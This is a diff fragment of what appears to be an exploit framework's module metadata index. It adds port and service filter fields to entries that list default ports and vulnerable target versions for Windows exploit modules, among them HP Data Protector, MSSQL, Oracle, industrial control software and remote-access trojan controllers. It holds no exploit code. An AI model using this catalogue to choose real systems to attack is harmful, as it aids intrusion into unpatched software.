+ "autofilter_services": [ + + ], "targets": [ "Enterasys NetSight 4.0.1.34 / Windows XP SP3", "Enterasys NetSight 4.0.1.34 / Windows 2003 SP2" @@ -89814,6 +116479,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Win XP SP3 English", "Win XP SP2 English" @@ -89847,6 +116518,12 @@ "platform": "Windows", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows FB 2.5.2.26539", "Windows FB 2.5.1.26351", @@ -89886,6 +116563,12 @@ "platform": "Windows", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Brute Force", "Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)", @@ -89923,6 +116606,12 @@ "platform": "Windows", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Brute Force", "Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)", @@ -89960,6 +116649,12 @@ "platform": "Windows", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Brute Force", "Firebird WI-V1.5.3.4870 WI-V1.5.4.4910", @@ -89993,6 +116688,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Gh0st Beta 3.6" ], @@ -90029,6 +116730,12 @@ "platform": "Windows", "arch": "", "rport": 10008, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "GIMP 2.6.10 (no DEP) / Windows XP SP3 / Windows 7 SP1", "GIMP 2.6.1 (no DEP) / Windows XP SP3 / Windows 7 SP1" @@ -90066,6 +116773,12 @@ "platform": "Windows", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Data Protector 8.10 / Windows" ], @@ -90101,6 +116814,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "HP Data Protector 6.20 build 370 / Windows XP SP3", @@ -90139,6 +116858,12 @@ "platform": "Windows", "arch": "", "rport": 3817, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Data Protector Express 4.0 SP1 (build 43064) / Windows XP SP3" ], @@ -90172,6 +116897,12 @@ "platform": "Windows", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -90208,6 +116939,12 @@ "platform": "Windows", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Data Protector 6.20 build 370 / VBScript CMDStager", "HP Data Protector 6.20 build 370 / Powershell" @@ -90241,6 +116978,12 @@ "platform": "Windows", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Data Protector 6.10/6.11/6.20 / Windows" ], @@ -90276,6 +117019,12 @@ "platform": "Windows", "arch": "", "rport": 3817, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Data Protector Express 6.0.00.11974 / Windows XP SP3", "HP Data Protector Express 5.0.00.59287 / Windows XP SP3" @@ -90313,6 +117062,12 @@ "platform": "Windows", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Data Protector 6.20 build 370 / Windows 2003 SP2" ], @@ -90350,6 +117105,12 @@ "platform": "Windows", "arch": "", "rport": 2810, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -90387,6 +117148,12 @@ "platform": "Windows", "arch": "", "rport": 2810, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -90424,6 +117191,12 @@ "platform": "Windows", "arch": "", "rport": 1811, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP iMC 5.0 E0101 / UAM 5.0 E0102 on Windows 2003 SP2" ], @@ -90458,6 +117231,12 @@ "platform": "Windows", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 / HP LoadRunner 11.50" ], @@ -90493,6 +117272,12 @@ "platform": "Windows", "arch": "", "rport": 54345, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows (Dropper)" ], @@ -90527,6 +117312,12 @@ "platform": "Windows", "arch": "", "rport": 23472, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Diagnostics Server 9.10" ], @@ -90563,6 +117354,12 @@ "platform": "Windows", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Targeting", "HP OpenView Storage Data Protector A.05.50: INET, internal build 330", @@ -90603,6 +117400,12 @@ "platform": "Windows", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic Targeting", "HP OpenView Storage Data Protector A.05.50: INET, internal build 330", @@ -90640,6 +117443,12 @@ "platform": "Windows", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Data Protector A.06.10 Build 611 / A.06.11 Build 243" ], @@ -90679,6 +117488,12 @@ "platform": "Windows", "arch": "", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Data Protector A.06.10 b611 / A.06.11 b243 XP SP3/Win2003/Win2008" ], @@ -90714,6 +117529,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Operations Agent 11.00 / Windows XP SP3", "HP Operations Agent 11.00 / Windows 2003 SP2" @@ -90750,6 +117571,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Operations Agent 11.00 / Windows XP SP3", "HP Operations Agent 11.00 / Windows 2003 SP2" @@ -90784,6 +117611,12 @@ "platform": "Windows", "arch": "", "rport": 5051, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Advanced Server All English" ], @@ -90815,6 +117648,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Powershell x86", "Powershell x64" @@ -90851,6 +117690,12 @@ "platform": "Windows", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Brute Force", "Borland InterBase WI-V8.1.0.257", @@ -90896,6 +117741,12 @@ "platform": "Windows", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Brute Force", "Borland InterBase WI-V8.1.0.257", @@ -90941,6 +117792,12 @@ "platform": "Windows", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Brute Force", "Borland InterBase WI-V8.1.0.257", @@ -90987,6 +117844,12 @@ "platform": "Windows", "arch": "", "rport": 5498, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IBM Cognos Express 9.5 / Windows XP SP3" ], @@ -91025,6 +117888,21 @@ "platform": "Windows", "arch": "", "rport": 6988, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "IBM System Director Agent 5.20.3 / Windows with WebClient enabled" ], @@ -91057,6 +117935,12 @@ "platform": "Windows", "arch": "", "rport": 1582, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IBM Tivoli Storage Manager Express 5.3.6.2" ], @@ -91090,6 +117974,12 @@ "platform": "Windows", "arch": "", "rport": 1582, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "IBM Tivoli Storage Manager Express 5.3.6.2" ], @@ -91124,6 +118014,21 @@ "platform": "Windows", "arch": "", "rport": "8880", + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "IBM WebSphere 7.0.0.0" ], @@ -91158,6 +118063,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3", "iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3", @@ -91194,6 +118105,12 @@ "platform": "Windows", "arch": "", "rport": 65535, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Alerting Proxy 2000/2003/XP", "Alerting Proxy 2003 SP1-2 (NX support)", @@ -91228,6 +118145,12 @@ "platform": "Windows", "arch": "x86", "rport": 8001, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Lianja SQL 1.0.0RC5.1 / Windows Server 2003 SP1-SP2", "Lianja SQL 1.0.0RC5.1 / Windows XP SP3" @@ -91262,6 +118185,21 @@ "platform": "Windows", "arch": "x86", "rport": 8400, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ManageEngine EventLog Analyzer 10.0 (build 10003) / Windows 7 SP1" ], @@ -91295,6 +118233,12 @@ "platform": "Windows", "arch": "", "rport": 105, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Pro SP0/SP1 English", "Windows 2000 Pro English ALL" @@ -91330,6 +118274,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 ENG", "Windows XP SP2 ENG" @@ -91365,6 +118315,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -91399,6 +118355,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro SP4 English" ], @@ -91436,6 +118398,21 @@ "platform": "Windows", "arch": "", "rport": 8082, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Microsoft Office SharePoint Server 2007 SP2 / Microsoft Windows Server 2003 SP2" ], @@ -91470,6 +118447,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal nc.exe" ], @@ -91504,6 +118487,12 @@ "platform": "Windows", "arch": "", "rport": 22222, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -91538,6 +118527,12 @@ "platform": "Windows", "arch": "", "rport": 7414, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x64" ], @@ -91569,6 +118564,12 @@ "platform": "Windows", "arch": "", "rport": 13579, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "PlugX Type I (old)", "PlugX Type I", @@ -91602,6 +118603,12 @@ "platform": "Windows", "arch": "", "rport": 3460, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Poison Ivy 2.1.4 on Windows XP SP3" ], @@ -91639,6 +118646,12 @@ "platform": "Windows", "arch": "", "rport": 3460, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1", "Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1", @@ -91674,6 +118687,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "POP Peeper v3.4" ], @@ -91707,6 +118726,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "POP Peeper v3.4" ], @@ -91740,6 +118765,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Realtek Media Player(RtlRack) A4.06 (XP Pro All English)" ], @@ -91774,6 +118805,12 @@ "platform": "Windows", "arch": "", "rport": 30000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Sap Business One 2005 B1 Universal" ], @@ -91811,6 +118848,12 @@ "platform": "Windows", "arch": "", "rport": 3200, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "SAP Netweaver 7.0 EHP2 SP6 / Windows XP SP3", "SAP Netweaver 7.0 EHP2 SP6 / Windows 2003 SP2" @@ -91845,6 +118888,12 @@ "platform": "Windows", "arch": "", "rport": 2000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ShixxNOTE 6.net Universal" ], @@ -91879,6 +118928,12 @@ "platform": "Windows", "arch": "", "rport": 30000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "SolidWorks Workgroup PDM <= 2014 SP2 (Windows XP SP0-SP3)", @@ -91914,6 +118969,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2/XP3" ], @@ -91950,6 +119011,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "StreamDown 6.8.0" ], @@ -91983,6 +119050,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 English" ], @@ -92016,6 +119089,12 @@ "platform": "Windows", "arch": "", "rport": 113, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 Server SP4 English", @@ -92052,6 +119131,12 @@ "platform": "Windows", "arch": "", "rport": 20101, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2003 Server SP2 (DEP Bypass)" ], @@ -92085,6 +119170,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP Universal" ], @@ -92118,6 +119209,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x64", "Windows x86" @@ -92152,6 +119249,12 @@ "platform": "Windows", "arch": "", "rport": 514, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2003 SP1 English", "Windows XP Pro SP2 English", @@ -92189,6 +119292,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Wireshark 1.6.1 or less" ], @@ -92226,6 +119335,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Win32 Universal (Generic DEP & ASLR Bypass)" ], @@ -92260,6 +119375,12 @@ "platform": "Windows", "arch": "", "rport": 1755, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro SP4 English" ], @@ -92292,6 +119413,12 @@ "platform": "Windows", "arch": "", "rport": 407, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -92324,6 +119451,20 @@ "platform": "Windows", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": [ "Automatic" ], @@ -92358,6 +119499,20 @@ "platform": "Windows", "arch": "", "rport": 1434, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": [ "MSSQL 2000 / MSDE <= SP2" ], @@ -92392,6 +119547,20 @@ "platform": "Windows", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": [ "MSSQL 2000 / MSDE <= SP2" ], @@ -92427,6 +119596,20 @@ "platform": "Windows", "arch": "", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": [ "Automatic", "MSSQL 2000 / MSDE SP0 (8.00.194)", @@ -92473,6 +119656,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "MSSQL 2000 / MSDE SP0 (8.00.194)", @@ -92515,6 +119713,20 @@ "platform": "Windows", "arch": "x86, x64", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": [ "Automatic" ], @@ -92549,6 +119761,20 @@ "platform": "Windows", "arch": "x86, x64", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": [ "Automatic" ], @@ -92586,6 +119812,20 @@ "platform": "Windows", "arch": "x86, x64", "rport": 1433, + "autofilter_ports": [ + 1433, + 1434, + 1435, + 14330, + 2533, + 9152, + 2638 + ], + "autofilter_services": [ + "ms-sql-s", + "ms-sql2000", + "sybase" + ], "targets": [ "Automatic" ], @@ -92625,6 +119865,21 @@ "platform": "Windows", "arch": "x86, x64", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -92660,6 +119915,12 @@ "platform": "Windows", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MySQL on Windows prior to Vista" ], @@ -92695,6 +119956,12 @@ "platform": "Windows", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MySQL on Windows" ], @@ -92728,6 +119995,12 @@ "platform": "Windows", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MySQL 5.0.45-community-nt", "MySQL 5.1.22-rc-community" @@ -92766,6 +120039,21 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Scrutinizer NetFlow and sFlow Analyzer 9.5.2 or older" ], @@ -92800,6 +120088,12 @@ "platform": "Windows", "arch": "", "rport": 2049, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP4 English" ], @@ -92834,6 +120128,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 English SP0-SP4", "Windows XP English SP0/SP1" @@ -92868,6 +120168,21 @@ "platform": "Windows", "arch": "", "rport": 3037, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -92902,6 +120217,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Novell GroupWise Messenger 2.0 Client", "Novell GroupWise Messenger 1.0 Client" @@ -92938,6 +120259,21 @@ "platform": "Windows", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows 2003 SP2 / NetIQ Privileged User Manager 2.3.1" ], @@ -92971,6 +120307,12 @@ "platform": "Windows", "arch": "", "rport": 689, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro SP4 English" ], @@ -93004,6 +120346,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent" ], @@ -93040,6 +120388,12 @@ "platform": "Windows", "arch": "", "rport": 998, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" ], @@ -93075,6 +120429,12 @@ "platform": "Windows", "arch": "", "rport": 998, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Novell ZENworks Configuration Management 10 SP3 / Windows 2003 SP2", "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" @@ -93111,6 +120471,12 @@ "platform": "Windows", "arch": "", "rport": 998, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" ], @@ -93146,6 +120512,12 @@ "platform": "Windows", "arch": "", "rport": 998, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Novell ZENworks Configuration Management 10 SP3 / Windows 2003 SP2", "Novell ZENworks Configuration Management 10 SP2 / Windows 2003 SP2" @@ -93183,6 +120555,21 @@ "platform": "Windows", "arch": "", "rport": 1158, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Oracle Oracle11g 11.2.0.1.0 / Windows 2003 SP2" ], @@ -93216,6 +120603,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic" ], @@ -93249,6 +120644,12 @@ "platform": "Windows", "arch": "", "rport": 10000, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Oracle Secure Backup 10.1.0.3 (Windows 2003 SP0/Windows XP SP3)" ], @@ -93282,6 +120683,12 @@ "platform": "Windows", "arch": "", "rport": 1521, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Oracle 8.1.7.0.0 Standard Edition (Windows 2000)", "Oracle 8.1.7.0.0 Standard Edition (Windows 2003)" @@ -93319,6 +120726,12 @@ "platform": "Windows", "arch": "", "rport": 1521, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Oracle 10.2.0.1.0 Enterprise Edition", @@ -93355,6 +120768,12 @@ "platform": "Windows", "arch": "", "rport": 1521, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Oracle 8.1.7.0.0 Standard Edition (Windows 2000)", "Oracle 8.1.7.0.0 Standard Edition (Windows 2003)" @@ -93389,6 +120808,12 @@ "platform": "Windows", "arch": "", "rport": 110, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows NT/2000/XP/2003 (SLMail 5.5)" ], @@ -93421,6 +120846,12 @@ "platform": "Windows", "arch": "", "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], "targets": [ "Windows x86", "Windows x64" @@ -93456,6 +120887,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "WinProxy <= 6.1 R1a Universal" ], @@ -93490,6 +120927,12 @@ "platform": "Windows", "arch": "x86", "rport": 23, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 Pro All - English", @@ -93528,6 +120971,12 @@ "platform": "Windows", "arch": "", "rport": 3128, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Proxy-Pro GateKeeper 4.7" ], @@ -93561,6 +121010,12 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "WinGate 6.1.1.1077" ], @@ -93595,6 +121050,12 @@ "platform": "Windows", "arch": "x86", "rport": 12221, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "ABB MicroSCADA Pro SYS600 9.3" ], @@ -93630,6 +121091,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Advantech WebAccess 8.0" ], @@ -93663,6 +121139,12 @@ "platform": "Windows", "arch": "", "rport": 4592, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31" ], @@ -93700,6 +121182,12 @@ "platform": "Windows", "arch": "", "rport": 20222, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Citect32.exe v5.21 NT4", @@ -93747,6 +121235,12 @@ "platform": "Windows", "arch": "", "rport": 1211, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal S3 CoDeSyS < 2.3.9.27" ], @@ -93787,6 +121281,12 @@ "platform": "Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "CoDeSys v2.3 on Windows XP SP3", @@ -93824,6 +121324,12 @@ "platform": "Windows", "arch": "", "rport": 20034, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "DAQFactory Pro 5.85 Build 1853 on Windows XP SP3" ], @@ -93858,6 +121364,12 @@ "platform": "Windows", "arch": "", "rport": 7580, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP SP3", @@ -93895,6 +121407,12 @@ "platform": "Windows", "arch": "", "rport": 7579, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "FactoryLink 7.5", @@ -93933,6 +121451,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "GE Proficy CIMPLICITY 7.5 (embedded CimWebServer)" ], @@ -93968,6 +121501,12 @@ "platform": "Windows", "arch": "", "rport": 38080, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP" ], @@ -94005,6 +121544,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "IE 6/7/8 on Windows XP SP3", @@ -94044,6 +121589,12 @@ "platform": "Windows", "arch": "", "rport": 12401, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3/2003 Server R2 SP2 (DEP Bypass)" ], @@ -94079,6 +121630,12 @@ "platform": "Windows", "arch": "", "rport": 12401, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP SP3", @@ -94119,6 +121676,12 @@ "platform": "Windows", "arch": "", "rport": 0, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows XP", @@ -94156,6 +121719,12 @@ "platform": "Windows", "arch": "cmd", "rport": 12397, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -94191,6 +121760,12 @@ "platform": "Windows", "arch": "", "rport": 4322, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP / 2003" ], @@ -94226,6 +121801,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MOXA MDM Tool 2.1" ], @@ -94260,6 +121841,12 @@ "platform": "Windows", "arch": "", "rport": 23, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3 - No dep bypass" ], @@ -94293,6 +121880,12 @@ "platform": "Windows", "arch": "", "rport": 910, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -94329,6 +121922,12 @@ "platform": "Windows", "arch": "", "rport": 910, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -94366,6 +121965,12 @@ "platform": "Windows", "arch": "", "rport": 910, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -94401,6 +122006,12 @@ "platform": "Windows", "arch": "", "rport": 912, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -94436,6 +122047,12 @@ "platform": "Windows", "arch": "", "rport": 912, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -94469,6 +122086,12 @@ "platform": "Windows", "arch": "", "rport": 912, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -94507,6 +122130,12 